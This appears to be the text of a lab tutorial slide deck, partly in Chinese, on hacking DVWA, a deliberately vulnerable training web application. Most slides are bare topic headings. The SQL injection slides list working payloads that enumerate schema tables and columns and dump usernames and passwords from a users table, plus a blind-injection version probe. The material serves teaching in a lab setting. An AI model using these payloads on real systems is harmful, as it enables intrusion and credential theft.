This document provides an overview of common web vulnerabilities and techniques for exploiting them using a vulnerable web application called DVWA (Damn Vulnerable Web Application). It discusses low-level vulnerabilities like brute force attacks, command injection, CSRF, file inclusion and SQL injection. It then goes into more detail on different SQL injection techniques like concatenation, error-based detection, union queries, retrieving data from tables. It also covers blind SQL injection, file uploads, and both reflected and stored cross-site scripting vulnerabilities. The document appears to be an introduction or guide to using DVWA to learn about hacking web applications.

1. DVWA - Damn Vulnerable Web
Application
Dvwa low level

2. 1.Brute Force

3. 2.Command Injection

4. 3.CSRF

5. 4.File Inclusion

6. 5.SQL Injection

7. SQL Injection Source

8. SQL 重組
$getid = "SELECT first_name, last_name FROM users WHERE user_id =
'$id'";
檢測是否有錯誤
1' and 1=1#
組合後變成
"select first_name,last_name form users where user_id = '1' and 1=1#";

9. 5.SQL Injection
1' order by 1#
1' union all select 1,2#
1' union all select user(),database()#
1' union all select null,table_name from information_schema.tables#
1' union all select null,table_name from information_schema.tables where
table_schema = 'dvwa'#
1' union all select null,column_name from information_schema.columns where
table_schema ='dvwa'#

10. 5.SQL Injection
1' union all select user,password from users#

11. 6.Blind SQL Injection
差別

12. 6.Blind SQL Injection
我們可以先
檢測版本
1' union all select null,substring(@@version,1,1)=4#

13. 7.File Upload

14. 8.Reflected Cross Site Scripting (XSS)

15. 9.Stored Cross Site Scripting (XSS)

16. Dvwa medium level
To be continue
vance@hst.tw